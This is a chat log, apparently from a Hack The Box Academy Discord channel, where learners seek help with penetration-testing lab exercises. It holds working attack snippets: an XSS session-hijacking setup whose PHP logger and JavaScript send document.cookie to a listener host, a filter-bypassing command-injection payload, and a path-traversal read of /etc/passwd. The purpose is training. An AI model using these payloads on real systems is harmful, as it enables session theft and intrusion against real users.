could be a whole list of things

Hello to everyone who has done the Skills Assessment - File Upload Attacks ,

?

I got the source code for upload.php but I don't understand how lol I would appreciate it if someone could explain and stuck

im trying with impacket mssqlclient.py again: ModuleNotFoundError: No module named 'impacket.examples.utils' can someone tell me what to do?

jsnice down for anyone else? any1 know an alternative

Maybe update impacket?

i got the newest v1.0 i guess

that is most definetly not the latest version

one scenario would be if this was an oddity in having domain admins be local admin on the box that could suggest they actually log into it from time to time. So if you leverage system or admin from some other means, you have a chance at dumping domain admin creds from the box.

yea, that was metioned

but thats not inherent to them being local admins, just a red flag

exactly

Newest vesion: https://github.com/fortra/impacket/releases/tag/impacket_0_10_0

Who do I talk to regarding someone trying to get me to help them with the CPTS exam?

maybe a serious rule break role or dm a staff?

Yea. prolly dming staff is best right?

ye

thats the one i used to update

Yo, I'm in the web attacks module at Error-based XXE.
Exploit works for the files in the question. However, other interesting files like the /etc/passwd only return 'entity reference loop'..
First of, this comes from php (loadXML), not the web server?
Also, I'm not sure what is the cause of the error. I was thinking maybe encoding or any special XML characters in the file, but I'm not sure which ones that would be for /etc/passwd. Also other source code files (index.php) return it

'entity reference loop'
are you doing direct output or OOB?

direct out. It's part of the error message which returns the file content for 'valid' files

well sounds like there's a reference loop: entity1 => entity2 => entity1.

Yea, sure. I just don't get how this is coming. I tried super random names, and I don't see how /etc/passwd would reference any other entity

what exact payload are you using?

Is it okay to DM to avoid spoiling anything for others?

i guess so

I really love the 90K wordlist for a SMB attack and then finding out after 2 hours I should have reversed the order 😄

Damn that sucks 😅

tac 👀

hey @high sentinel you mind helping me understand something if you know... because I'm just not sure how this works in terms of vHosts and IPs regarding adding them to my /etc/hosts or am i putting them in the wrong place - currently doing Info Gathering - Web Edition; Active Infra ID - and I got the answer - but I had to use the cheat sheet bc nowhere in the documentation up to that point talks about using vHosts (there is a virtual hosts section, but after)

yeah, sure

Are you asking how vhosts work?

basically? because in that section it says "these are the vhosts you'll need"

but nowhere previously did it talk about using vHosts

So when you type in url into a search bar there is a process called Dns that maps the url to an ip

ye

i get that

stealing my "work" 😄

i just want to know what makes the curl command that gets me the answer different from the other tools

Lol

Sorry haha

np, i was joking 😄

what command did you use?

The computer checks your host file first, then the dns cache, then it will go thru the dns process. The /etc/hosts file is just a way to resolve a name to an ip

curl -s and -H syntax that was in the cheat sheet

ok so i just forgot to add the IP to the vhosts in /etc/hosts

then?

well, the prorities of local/remote host resolution actually depend on the config. It's usually like that but you can set it up how you want to

add -v any try without the -H and with it. Compare both outputs of the requests going to the server

That should give you the idea of how that works

ok I figured it out

I just didn't add the IP to the vhost

added it; refreshed the webpage

:D

i'm just the big dumb

nice, but you may want to try other ways as well 🙂

You may not have the option to edit hosts file in some cases (like pivoting though non-rooted compromised host)

wait no

i'm still dumb

:^)

/etc/nsswitch.conf is the file where priorities are configured

We all make stupid mistakes haha. Part of learning : D

The other day I was stuck on a stupid question because i forgot how to rdp 💀

Do you guys hack servers for me?

no

This group fund for python questions?

this is for academy. There is a #programming channel.

OH

I AM

THE HUGE DUMB

thanks @high sentinel and @raven cairn

has anybody a good course for Machin learning>

tanx

i realized why i was getting the result weird... I was curling the wrong http page :^)

tanks

you will need to verify your hackthebox account in #bot-commands to see it

i forgot to actually put the vHost URL and was trying to use the actual IP :^)

Learn python first if you don’t know who to program. Maybe take some stats classes.

My cousin does Ml as a job

when I tell you I died on the inside when i made the dots connect

but I didn't want to move on to the next thing without knowing what the difference was

the difference was

As i've said:

nice, but you may want to try other ways as well 🙂
You may not have the option to edit hosts file in some cases (like pivoting though non-rooted compromised host)

well yes that's why I said; I understood how the -s and -H worked

it logically made sense how they worked in my brain

-s is source and -H host

wut? isn't -s for silent?

idk

that's just what the cheatsheet said

:^)

yes

yes it is

there's also another option for stuff like burp 🙂 you might want to check that as well

i use python for programing math equation and i know how can i use it for solve PDE or FEM and know i want to learn machin learning

i'm trying to stick with the tools provided so far :D but if burp comes up i won't hesitate lol

hey everyone, nood here. I'm trying the redeemer challenge, but when I try connecting to redis: redis-cli -h IPaddress. Nothing happens. it just hangs there. Any advice?

if you're further interested in that, it becomes even more interesting with HTTPS and stuff like SNI. Domain fronting is an interesting related topic

Is this part of hackthebox academy?

This is mostly focused on modules so we might not be of good help

add debug/verbose flags? check traffic? ping the box?

There is a #challenges channel but i think you need to verify

Thanks, will add verbose to see whats happening. I can ping it and the connection is happening to certain extent, but just hangs

are you sure you just don't have an "empty" prompt?

did you type something in?

i can type stuff in it, but nothing happens..

I have to type ctrl + c to exit it

nc -nvz -w 5 ip:port?

Whats nvc ?

typo 🙂

OH i see what the z option is

neat

Can't parse x.x.x.x:6379 as an IP address

😄

i meant ip port 😄

lol

ahh i see 🙂

(UNKNOWN) []x.x.x.x 6379 (redis) open

but then , using redis-cli, it just hangs there.. not sure whats happening. I tried restarting the server couple of times already

what if you just connect using nc and type help or keys?

i've told you what to try. Not sure what's happening in there, possible different port/host, can't tell

But using nc is not working either, as above.

I've seen some people demoing it and they go straight to IPADDRESS:port> prompt

not working? 😄 how come?

(UNKNOWN) []x.x.x.x 6379 (redis) open

sounds good to me

but where is the redis-cli prompt?

that's not my point. If you're having further trouble you need to go deeper

how? 🙂

already told you - check the traffic

let me take a pcap and check

i'd say it would be easier to just do tcpdump -i any -vvv tcp port 6379 in one window and use the nc in a second. Typing anything should show you data going both ways

Thanks, will dig and see what I can find.. at the moment, I can't even see any traffic on the tcpdump

as soon as I come off the VPN, boom all the traffic starts flowing through tcp dum p

sounds like a vpn issue

Need a sanity check for the Skills Assessment for Using Web Proxies, in particular the first question, getting a flag from lucky.php.

Can't tell if it's bugged or if I'm doing it wrong.

Can I dm you about the zap scanner module? im almost 100% sure i have the flag but its telling me its not correct nvm im very very dumb

Can someone help me with the Burp Intruder module, specifically: Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag

I don't understand how to do it

feel free to dm me

Thanks, sent you a message.

how do i copy and paste from host to pwnbox

ctrl+c > ctrl+v (if pasting to the terminal, ctrl+shift+v)

doesn't work tried it

first time that pwnbox is run it asks if you want to share clipboard

hmm never got asked that any time i've run it

click the lock/icon next to the https in the address bar of the page

i don't have that it only shows me encryption ssl key

running firefox

it's under site settings

¯_(ツ)_/¯

might be under the shield icon

lol nope

i have vnc config window that says kclipboard but its just a window no oik button or nothing

¯_(ツ)_/¯

pwnbox is hot garbage i'd rather put my &&&& in a beehivew than use it

Simple solution, dont use it 😅

lovely sentiment but some of the tools they want you to use don't work on newest version of kali

and then i spoend hours trying to debug which is bullshit

I havent had a single issue at all. The only time ive had to use pwnbox was for some web related things where scans wouldnt run properly on my kali machine

all tools so far have been perfecty fine

Which tool are you having an issue with?

well thats great here's a cookie for you: cookie=klhjdfsg8h94539t8hy4we5tt

😄

lol. Well i was going to try to help you

now im not

that's ok it was a joke don't get all butthurt

Based

Web Pwnbox is kinda bad

I have issues with full screening it

lol. Im spending my time trying to help you. Heres a valuable lesson, you are not entitled to help from anyone. If someone is going out of their way tot ry to help you, its generally a good idea to try to be nice to them. Now, best of luck. I hope you get your tool working

I just dont use it if i can avoid it

Using a VM with vpn is just easier

agreed. Altho I do have to get used to using an in browser machine. RTO is only doable using the provided in browser machine. Thats how you get to use cobalt strinke

But i think ill keep avoiding pwnbox for the time being

I can’t wait to do RTO

Yea. Im super excited for it

Thats the only thing pushing me through the more boring parts of CPTS lmao

Hey @graceful rampart can you sanity check sth for me, info gathering web says to use a "numbers.txt" file for the wordlist in active subdomain enumeration in the example but I don't see anything? lol am I just... silly?

I was not doing good notes on the exercises back then 😬

oof

ik the pattern file is one we create there but like it's asking for a wordlist I just don't see

I have great notes on those sections, but none of it really gave me any issues and none of it was really new to me so i didnt bother taking notes on the exercises

sure its not a resource?

hmm

i checked pwnbox as well

im looking at the module, i dont see it mention a numbers.txt wordlist anywhere

in the example

ah. iirc you dont need to do that

thats just an example

I know but it's nice to follow along :^)

i was just gonna give up and start answering questions anyway

lol

fair. It appears to just be a placeholder for whatever wordlist you want to use

yeah

ugh

stuck at that how many zones... i must not be able to count right or something LOL

I think you might be looking for this #modules message

it's funny because that's my own answer

I just probablycan't count that's all

Right lol

If you're in the 20s or higher, you're WAY off

Took me a while to finish that question

I STG

I must have had a space when I put that in

because I put in the answer way earlier

and it was incorrect

but no apparently it was exactly correct

brb malding

It's not the amount you would expect

oh no; I had the answer

i definitely had the answer

I just had a space in my answer the first time

Ahh

Lol nice

Happened to me in the vhost exercises

rest of the questions nailed

this one "can I just not"

I did that earlier. And then as soon as I went to message someone I realized I had a space that wasn't supposed to be there

also while statements are based at basic automation without looking for a specific tool that does it better

cat x| while read var; do task var other args; done

Hey all, I"m struggling on Shells and Payloads for host 1 ||where i know the attack vector but for some reasons metasploit is erroring out. When i manually nagivate to the loaded exploit i get a 500 error. Is there something wrong with how i'm setting the options?||

||The first time i try to navigate to it manually it gives a 404, when i reload it gives 500, which i guess make sense considering it suppose to create a metainterpreter or whatever its called||

Your lhost dosent look correct

its the jumpbox

I'm well aware

The target network is 172.16.1.0/23

ahh, maybe that first one?

You shouldn't be using the docker ip

Lmao

word, thanks

Np

🤦‍♂️

meh, same error

You could always just generate a payload with msfvenom

Upload it and then trigger it manually

Or try not using a meterpreter payload

||yeah thats a thought, but need to be converted into a .war file||

You can generate a war file is msfvenom

hm.. kk

With*

thanks

Np

fucking hell... too easy drill sargent.

thanks again dude

Np

Hi

Hi, can someone help me please? I'm stuck in Module "Introduction to Bash Scripting"

y so serial

What?

funny name for a git repository

?

nvm

what's the issue?

ysoserial.net 🙂

Oh ok, sorry I didnt know

huh? 😄

Nah, thats not really helping me, but thanks. My code seems to be fine and only has very few lines, but the result wont be accepted

I even tried it with my local VM and countless other ways - same result, but wont be accepted

i'm not getting what the issue is. You didn't post anything specific

ysoserial is not related to bash at all, it's related to java deserialization attacks

One second

Anyone else having vpn issues where the host address isn't resolved and openvpn loops?

Yeah, sorry my bet

My code is:

no, post a specific issue that you're having if you're expecting help

var="9M"; salt=""; for i in {0..27}; do; var=$(echo $var | base64); done; salt=${#var}; echo $salt;

The code is supposed to encode $var 28 times and then get the number of characters of the hash

Sadly I dont understand my error

and the error is?

Simply that HTB Academy claims my answer as wrong

yeah i get that, i mean you're not getting any error when running the code, right?

what does it output?

34070

When I use salt=$(echo -n $var | wc -m) it simply retuns 34071, but this is still wrong

And with that few lines of script code I'm sure the error is somewhere else

do; var is not the correct syntax by the way

yes, I didnt use ";" actually, I just wrote it in separate lines

and i think the issue is also using base64 instead of base64 -w0

Let me try, 1 sec

Nope, still wrong :/

then just debug it - check the actual output, lower the number of iterations etc

I already did this

I also tried with 27 and 29 iterations instead of 28

And various code variations

you're not getting the point

try 8 iterations and debug the output you're getting

then if it's correct, just increase/decrease gradually until you find you what the issue is

The output is already correct

I even tried copying the output to a file and counting the characters from there

How do I know if the output is correct at 8 iterations?

In command injection module "Bypassing Other Blacklisted Characters"
I'm having trouble understanding why my payloads not working
||ip=127.0.0.1${LS_COLORS:10:1}cd%09${PATH:0:1}home${LS_COLORS:10:1}{ls,-la}||
I'm attempting to access /home but I must not be understanding something quite right.
In my mind this payload should do....
127.0.0.1;cd /home;ls -la
Which should execute but I'm just not understanding something

shouldnt those be flip flopped @low vine

i.e., ls -al /home

My bad understanding is that each section is executed so 127.0.0.1; Then moves to /home and then executes ls -la?

or is my understanding wrong on that @sly tapir

Ill give it a go and see what happens I feel like I cant be too far off just been struggling for a minute

it works on the terminal that way...your not wrong... just tried it ; learn something new everyday

i always just do ls -al /directory/

now that I think about it

thats probably better from what I'm trying to do lol

Grr okay have to be messing up something else let me read back through everything again

maybe {LS_COLORS} is different on target? Looks like right idea, just try to do it different

So I am working on the PtT Windows Module of Password Attacks. The first task tells me to RDP to the machine using the provided credentials and find out how many tickets there are. When I try to RDP in, though, it keeps giving me a logon failure. I am 100% certain I am using the displayed credentials and it is driving me insane.

I'll look at env variables again I didnt quite think of that

I just assumed what was there facepalm.jpg

tfw i wonder why the ffuf request in the info gathering web is taking forever... Turns out; i needed to reset the target; idk if this is one of the targets that has a dedicated IP or not when you reset but I got the same IP :D

Did this one recently, DM for more hints

DM me.

ok so ffuf is a neat tool :D

For the Firewall and IDS/IPS Evasion - Hard Lab, im so stuck on this one any help please

scan for all ports

okay ill try that i keep coming up with only 2 thanks

also you'll need to use a specific type of scan talked about in the module

no super fancy tricks to at least identify it

okay thank you

i have the port but not the version

no question...just venting. The RDP session for the final assessment in the Shells and Payloads module is ridiculously slow. Took me 10% of the allocated time to just login to apache on the first host 🫠

yes; now take what you learned from the IDS/IPS section and see what you might be able to do

i was missing a freaking 0..........thank you so much again

mood

same as when missing a god dang ;

i swear i was about to go mad lol

dude I was so mad earlier; my answer had a space in it so it didn't accept xD

OMG yes!!! thats the bs ive had too haha

Im a firm beieve that the pivoting module should come before that one

@graceful rampart just finished the info gathering one WOO

Nice. I just finished the ffuf module

yeah, i was thinking i should just use chisel or something... it will take me all day to complete the assessment at this rate

Yea. I used sshuttle to pivot via the attack machine

Need help with Hard Skills Assessment - Password Attacks, I made it quite aways I know im on the right track problem is there must be something wrong with the worldlist selected because im trying to crack a password and its taking forever.

dm me what youre trying to crack and what wordlist youre using

Okay thanks MPT

Need check for the Skills Assessment for Using Web Proxies
Can't tell if it's bugged or if I'm doing it wrong.

What issue are you having?

I couldn't find the flag for the first question.

If you're still having issues shoot me a dm. I'm not at my pc right now but I did that module earlier today so you should be able to jog my memory

ok ok I'll write to you, thanks

somebody save me?

:)

from the nothing you've become?

I registered on the site, ok! But when I try to connect to HTB academy it says that my email has not been registered.

some bug on the page is happening

Can ayone help with the Footprinting Lab - Easy? I'm not sure if my question would end up being a spolier, so anyone around for a DM would be helpful. Thanks.

You can DM me if you need

Academy and standard site are separate

I´ can´t use same email?

You need to create an account on academy you can use the same email

He didn't let me use the same email, says the email exists in the database

Are you trying to sign in, or create

Because there shouldn't be an issue with creating an account

Usually if an email doesn't exist in the login database means creating an account should be ok

If it exists, are you sure you don't already have an account?

Have you asked it to send you a password reset?

Easy solutions here

I managed to do but only with another email. Same email doesn't work

no

@fathom pendant why don't you hang around in the vc sometime? you seem to be pretty active 😄

I don't like talking to people. I do it as a job and that's enough already

I did it! Thank you

Anyway straying off topic in this chat

What's the right place?

sorry!

#1024429874246590575 for general help, this channel is for questions regarding the modules in the academy site

ok bro, thanks!

and sorry!

~~I'm having trouble with the lab "Attacking Common Services - Hard". I've gained a basic foothold for the user ||fiona|| and can connect via ||RDP|| and ||MSSQL|| - and can impersonate the user ||john|| - however, cannot seem to get ||sysadmin||.

Has anyone finished this lab that could help out / DM?~~

Scratch that; I had a sudden realisation and solved it.

TL;DR What is the best way to get a reverse shell through proxy?

I just finished the Shells and Payloads module and in the assessment I used chisel to pivot through the host.

When using the psexec metasploit module, I had to use a bind_tcp payload, as I couldn't figure out how to catch the reverse shell. I also couldn't drop into an actual shell from the meterpreter prompt and just had to use its built in cd,cat etc. to get the flag.

What is the best way to pivot metasploit exploits and catch the rev shells?

In the file inclusion section question #2 is stumping me and I'm not understanding why. Submit contents of flag.txt and we know the file path. I'm not understanding why I cannot pull the contents from this. I can read etc/password with X=||../../../../etc/passwd|| but cannot get access to the flag.txt file even though I know the direct path I should be able to just do X=../(DIRECTPATH) should I not?

should just be something like ||X=../../../../usr/share/flags/flag.txt|| should it not?

Apparently I'm dumb and somehow didnt do this correct first time ><

Read the rules bud. This isn't the server, nor the channel for this anyway.

Did you figure it out?

No

Did end up figuring it out thanks.

Getting stumped on basic bypass but working through reading through everything again

Yep no worries. Just a tip for asking a module related question, post the exact exercise (e.g. if it's the Skills Assessment, or one of the module exercises) so the person can go and look it up on their notes or look at the question themselves

Yeah in most cases the answer is just right there hahah

It always is even if im banging my head for hours

Makes me cry sometimes :p

The problem I seem to have is logically walking through. Like for example here I see that it allows ".." and encodes the "/" I dont quite understand the next test I should make for taking my next small step

Hmm well, there isn't really a "logical" next step that you're supposed to test. You try whatever you think might work.. and if you do this enough times, you just tend towards a framework you can use when you encounter a specific class of vulnerability

So ended up getting it but I dont understand how I would get there other than knowing its something I should try

Just trying to make sure I have notes as a sort of smal mental checklists when going through more web apps.

hey guys can somebody help me out with the Skills Assessment - File Upload Attacks, so far i got the upload.php source code, I understood the logic and bypassed all the filters, i did get a couple of success however my uploaded files do not accept php commands

got it

yes please

Hello folks! In the module RDP and SOCKS Tunneling with SocksOverRDP, anyone faced the following issue when loading SocksOverRDP-Plugin.dll?

Never mind, worked after bypassing Windows Defender.

If you're using Metasploit your best bet is using autoroute. I personally just don't like meterpreter. If I'm pivoting through a Linux host I'll use socat to set up a reverse port forward. On a windows host you can use netsh to do it

Can anyone please give me a hint in the Documentation & Reporting Practice Lab on how to get Domain Admin? Seems kind of hard for a first question so i feel like I'm missing something

Maybe today any help for this problem?! 🤯

Can anyone pls hack an instagram account for me pls. I would very much appreciate it. Dm me for infos.

@vale salmon Can I DM you regarding this please?

Sure

no read the rules

Im sorry i didnt relize

also for future reference, asking on discord of which is corporate owned and susceptible and agreeable to even low level supoena for a stranger, that could be an undercover cop for all you know, to commit a crime on your behalf is incredibly, monumentally, stupid.

What academy modules are recommended to read for OSCP preparation?

hello, I have a question regarding the skill assessment of windows command line, the 3rd question ask me to enumerate the system information to get the host name and I will find the flag for the next question, I manage to answered the question but never saw a flag, I try to use the answer as the password for the uses3 user but it looks the password is wrong can someone give me some insight or I am missing something?

the whole CPTS path really

id exclude the AD module

Youll end up confusing yourself on OSCP if you learn that much AD

ok never mind this is very misleading XD correction user3

post that in #858470491676737536 looks like a typo

oki

I think it's more impressive if no one has brought it up until now

lmao

Either that or we're all stupid and misreading it as the correct user anyway

Lol

I have to recursively scan the paths to find the flag. I use this command ```ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v

make sure you have the correct IP and port

i got it right

just don't wanna expose anything right here

dm me the exact command you used

i don't even think I can expose anything here you go: ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://165.227.231.233:31349/FUZZ -recursion -recursion-depth 1 -e .php -v

Make sure you got the IP and port ocrrect. I know, you already checked but i said the same thing during that module several times and i had the wrong ipa nd port in my commands

hmm its correct. should i open up a chat with support?

🤷‍♂️

ill open one up

usually its a couple things, the ip/port because you tabbed a previous call, the list directory is wrong, or the list doesnt have what you need

he guys ı m the hacker

ı like fotball club is the GALATASARAY

poggers

where from ?

ı m from TÜRKİYE

NO ENGLİESH

Server rule number 5: Unless otherwise dictated by the channel, please keep all communication in English.

OKEY SORRY

Hey guys I can’t find prolabs channel here

At the very bottom i.e, #prolabs-dante

Hey all! I'm stuck at the XSS Session Hijacking part. I've tried to search on Discord but couldn't find an answer so I'd appreciate some help 😄 Put some spoiler tags.

||This is what I've done so far:

• Made an index.php using the code provided:
  <?php
  if (isset($_GET['c'])) {
  $list = explode(";", $_GET['c']);
  foreach ($list as $key => $value) {
  $cookie = urldecode($value);
  $file = fopen("cookies.txt", "a+");
  fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
  fclose($file);
  }
  }
  ?>

-I use this payload in the Profile Picture URL:
"><script src=http://10.10.15.200:80/script.js></script>

• I put this in my script.js to grab the cookies:
  new Image().src=‘http:/10.10.15.200:80/index.php?c=’+document.cookie;

I've also tried:
document.location='http://10.10.15.200/index.php?c='+document.cookie;

I use this to start my php server:
sudo php -S 0.0.0.0:80

All I get on my server is:
accepted
200 GET /script.js
closed||

Thanks for helping ❤️

Did you read the script and fill out the “remote addr”

I still can’t see it

Plz help

yes! i am using this index.php:

||
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['10.129.52.35']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>||

I'm still getting the same output in my terminal though

go to #welcome. You need to verify your account

Got it thank you

Can anyone please give me a hint in the Documentation & Reporting Practice Lab on how to get Domain Admin? The admin hash doesn't get me anywhere. Seems kind of hard for a first question of a medium lab so i feel like I'm missing something

have you done the rest of the CPTS course yet? or did ya skip to this one?

if youre trying to use spoiler tags you do it like this: || message here ||

thanks for || help || It's ||work||

I could use a nudge on Footprinting, Medium Lab. I have been unable to find the user login or sa credentials. I found a mounted drive, but when I tried to mount it to my machine, I cannot access the results. I have tried various enumeration techniques for SMB and RCP, but I always get turned away because I don't have credentials. Unable to login via RDP. Any tips would be appreciated.

Yes i did

TBH, any of them. Use Academy to smooth out your weak areas.

Then I dont have much advice other than reviewing your AD notes

it should be fairly easy then

the final two modules are meant to be culminations of everything youve learned

You dont need the domain name in the kinit command

just LINUX01$ should work

Im having problems connecting via RDP in Kerberos - Windows, AD module. Wrong credentials :S

Yup, it worked . Thanks! By the way do you know what's the difference between inserting domain in the name and leaving it out? Since in the module says to add @domain when using kinit.

Not sure. I dont use kinit much. Usually just set the KRB5CCNAME variable manually

But i believe its cuz kinit only expects the username because it can pull the domain from the ticket

For the 'documentation and reporting' module, they start us out with "write hat" as a reporting tool, but this might very well be one of the worst pieces of software I've ever used. What are the better options?

the reccomended way to learn si to do some HTB Academy modules, then attemt to do 2 of the reccomended htb machines (with a writeup if needed) and then attempt a 3rd reccomended machine on your own

Hello, how can i compile the Inveigh Github Repo to inveigh.exe?

Hello Im doing the module GETTING start

and i have an issue with my nmap cmd

What error are you receiving

Module: Local File Inclusion
Section: PHP Wrappers
Issue: Used the data wrapper technique and can view 320___.txt file but can't read the flag any help is appreciated

Lesson learned brute forcing winrm goes faster then rdp. Wish i found out when i started 2 data ago. 🫣

No worries !! Solved

data ? or days

Days.

Hi, I am beating my head against a wall in Password attack - credential hunting in Linux. I used the hint of user and known PW and created mutated list of passwords and tried with hydra and cme but found nothing. Found the expected pw in a forum post from a year ago but that also didnt work. Can somebody dm me the kira pw? Waiting 1h in front of a screen is not really rewarding

Ok thanks, I'll have to look up how to do that with socat. My pivoting skills are limited to a chisel walkthrough at the moment 😅

Isn't oscp final exam like 3 machines

3 ad machines and iirc 4 other boxes

You'll learn in the pivoting module

Yea. 3 AD machines 4 others. I can't say a lot fo about it but the AD is mind numbingly easy

That's what I've heard haha

Ive been hearing people get tripped up on the oscp ad section cause they overthink it

and then when they stop its seriously done in like 30 mins to an hour

Yea

Took me 45 minutes

Nvm. Maybe as a hint, username is case sensitive and the case in the hint is not correct.

folks at OFFSEC going through this chat

Oh i didnt pass the exam lol. I just did the AD bit in 45 minutes

Theres very very little actualy AD exploitation

Do you know what your pain point was? or just a mystery Fail letter?

Yea, i was most definetly not ready for OSCP when i took it lol

so blitzed the AD and bombed the individual boxes? lol

anyways, in other news: The dreaded day has arrived. My kali VM finally pooped the bed

pretty much. My time studying for OSCP was weird cuz its when I discovered AD for the first time and fell in love. I spent a vast majority of my time just learning about AD

Rip

Does anyone know whats the command for retrieving the content of a imap message?

Have tried fetch command, but haven't gotten results back

mutt -f imap://server

if you meant that you actually wanted to connect to the server and read the mailbox

otherwise you can locally do mail

or even read a .eml or so .. not totally clear what you meant there

it so happens that the message isn't in the mailbox section

okey okey i'll try

no clue what you mean by that

i meant INBOX

mb mb

if inbox is empty, then it's just empty

there's nothing to do about it

right, okey

try checking other mailboxes. Inbox isnt the only one people exclusively use.

Hey team, Im stuck for days on the Password Attacks Lab -HARD Initial access as I need to reset the Target all the time... Can somebody help me on that please?

what part are you stuck on

I'm currently at Footprinting;Imap section

I have found an inbox with a message, but i have trouble dislaying the content

have selected it with LIST command

and select

what other email service is there besides imap?

theres both pop3 and imaps

dming you

Is your message for me or are you asking to somebody else

you, what part of the lab are you stuck on. I have some loose notes on it.

Initial access, I triy ||Bruteforce the smb, Bruteforce the rdp, both with johanna user only and also with user list|| but nothing

and i have really good notes on it

which wordlist did you use

the one given in the Resources and the mutated one created with this list and the rules given

Shoulda found it then if your bruteforce commands were correct

Its one that triggers so fast I thought it was a false positive at first

I mean it's my second day of bruteforce attempts hahahha

yeah so probably less of using the wrong list or wrong service and more likely your command arguments are wrong.

can I DM you??

at the airport and sounds like Man in the Purple Tux might have better notes than me. I don't have the command structure I used listed.

just that very much if you have it correct, youll find it in seconds. If its taking a minute or longer, somethings wrong.

ok

strange

@graceful rampart are you available for helping me?

Dm me what command your using

no worries, got it!

Hello can someone pls help me

i got hacked and i am trying to hack my account back

for google

or i wanna do something back to the person that hacked my account

how do i get there Ip address

so i can turn off there wifi

Wrong server

We dont do that here

darn it then what do you do here

its for industry professionals to discuss and learn.

darn i was hoping to just get there Ip

no. read the rules

Well i will figure it out

second time that not taking the time to fully read the section sends me down a rabbit hole....

I need help with the Hard Skills Assessment on the Password Attacks module.

I have come a long way made it far, just unsure how to do a specific step to get to the next stage.

I cracked a .vhd file, just unsure how to mount it on the windows machine, i have tried transferring it and accessing it through rdp and its asking for admin privileges. Unsure what to do here, the section gives very little detail on mounting a harddrive.

has anybody had issues using wireshark within the attack box given to you in active directory enumeration and attack module... not your attack box from htb but the one you have to rdp into in order to enumerate the internal network

what specific issue are you having?

when I try to start wireshark from applications>pentesting>sniffing spoofing>wireshark as htb-student it does not open after putting in password, if I try from command line as htb-student I get zero traffic on any interface probably because not root, when I log in as root wireshark will not open at all through command line

I can share screen in academy voice chat and demo exactly the problem

you can use this to mount it in linux #modules message

but for windows if you can't double click to mount it i think you should be able to in disk manager (i'm not sure about windows home)

Hello, i'm in Password Attacks > Credential Hunthing in Linux
I tried creating a custom.rule to include LoveYou1 in it, but I couldn't find kira's password. Can anyone help?

i realized a lot of people are having an issue cuz you need admin perms to mount a vhd and a lot of people are just trying to mount it on the windows machine is the lab

If you want to mount it on windows youll need your own windows vm to do so on

use the custom rule that is provided

i think the mindset of this section is if you have to download the .vhd file on to your machine to extract the hash anyway, so you can just find a way to mount it on your machine, that's why they don't let you mount it on the target machine and i think this caught a lot of people off guard

agreed

but the module only show you how to extract and crack the hash not mounted on linux (only on windows which is double click 🤣 )

I just happen to use a windows VM for attacking a good bit of the time so i just had to boot it up and connect to smb

yea

sleight oversight

i think i did the same thing the first time i do this module and the command that i was sharing is i think from someone that help me on this module

oh yeah the first time i do this the hash was corrupted 🤣

lmao

i use the custom rule that is provided. but can't find password.
||hydra -l kira -P ./loveyou_passwd.txt ftp://10.129.70.146 -t 32||

idk what you want me to tell you?

Oh, wait no

is it correct?

its not in the list to begin with

you have to add LoveYou1 to password.list before mutating it

(if you want the bruteforce to go quick just create a fill withonly that 1 password and then mutate that)

oh

thanks, i will try !

i put loveYou in passlist and mutated it..

Hi guys! Having some trouble on Attacking En
After obtaining Domain Admin rights, authenticate to the domain controller and submit the contents of the flag.txt file on the Administrator Desktop.

Already have the creds and added the user to the Domain Admins yet i can't RDP to the DC.

Edit: I'm just dumb, PTH is a your friend.

Hi im doing the intro to windows command line module and i been stuck in this question for hours, what should i do?

which section are you on?

oh i already solved it thank you, i was at the wrong mahine it seems that you have to ssh to 172.16.5.155

oh yeah i last question of the skill assessment

they should noted somewhere you need to do it on the DC

Filter by 4625 events

Get-WinEvent -FilterHashTable @{LogName='Security';ID='4625 '}

it is confuse cause they dont say that

Thank you 👍

Hey folks, I have a question about the Meterpreter Tunneling & Port Forwarding section in the Pivoting, Tunneling, and Port Forwarding module.

||In the example where they describe setting up autoroute, they use the subnet "172.16.5.0/23" - but the IP address you see on the interface is 172.16.5.129 with a subnet mask of 255.255.254.0. Technically, wouldn't that make the subnet 172.16.4.0/23 as the usable IP range is 172.16.4.1 - 172.16.5.254?

If so, the answer expected for the second question is wrong, as far as I can tell (and I'll post this in #858470491676737536) - but if it's not wrong, I have no idea why you would supply 172.16.5.0/23... any ideas?||

for AD skills assessment 2... I am stumped. I have user B*** and the db creds I can use for a system shell... but I am not sure where to go from here

Hey, anyone available for some help with the pivoting module? Specifically the reverse port forward section? My ssh -R command isn't working for me

i skipped the pivot module and went straight to AD... dont recommend lol

ouch. Yea, not reccomended

I'm the opposite, I skipped a few modules to go to pivot 😅

good call

Dm me the command youre using

DM me

"Υou have just completed the Active Directory Enumeration & Attacks module! "

sweet jesus dont skip the other modules lol

hey @rich vale have you done the redeemer machine

@sterile thistle nope, really just went straight in for the AD module

do you know much about redis servers?

sorry nope, dont know anything about them

ok thank you

careful with spoilers

Hi there 😄

I am a newbie in the information security field. I want to become an expert. Would you guys please help me to fulfill my desire.

Please suggest where to start from bug bounty or just do ctf.

Тут є українці?)

english only

Any hints for Password Attacks module for section Password Attacks Lab - Easy where the question is Examine the first target and submit the root password as the answer. ? Tried hydra and ncrack with username root and passwords list provided by HTB and mutated password list sorted and stripped from duplicates, created from custom rule resources using the passwords from resources as well. Thinking of using rockyou but seems too much for this lab and will take too much time even with highest threads possible.

Are you only trying to brute-force the root user?

Perhaps you need to find your way in with another user first and work up to root once you've gained a foothold. Which is the case for almost all labs/boxes on HTB. You will seldom ever brute-force root from the outset.

For ssh yes, for ftp i'm currently trying full username-password combo

but doing it with ncrack for ftp since hydra has been screwing me around, hope ncrack will work

oh found creds for ftp !

Excellent, now keep pulling at the thread until the whole sweater unravels.

aaaand owned . Thanks for the hints

How to start pen testing for adroid in kali linux?

C or rust for getting into hacking ?

Whichever you like more lol. But programming is very different than hacking

Hi I'm doing The Live Engagement of shells and payloads and am struggling with the first host.

I have found where I think I should upload the .war payload and successfully uploaded it, but when I navigate to that page I get a 404 error.
I also tried msfconsole tomcat_mgr_upload script but adter uploading the script get ,,exploit aborted due to failure failed to execute the payload"
Thank you

is there any benefit of using medusa over hydra? One of the challenges call for it but the performance seems to be extremely slow compared to hydra.

I hate medusa

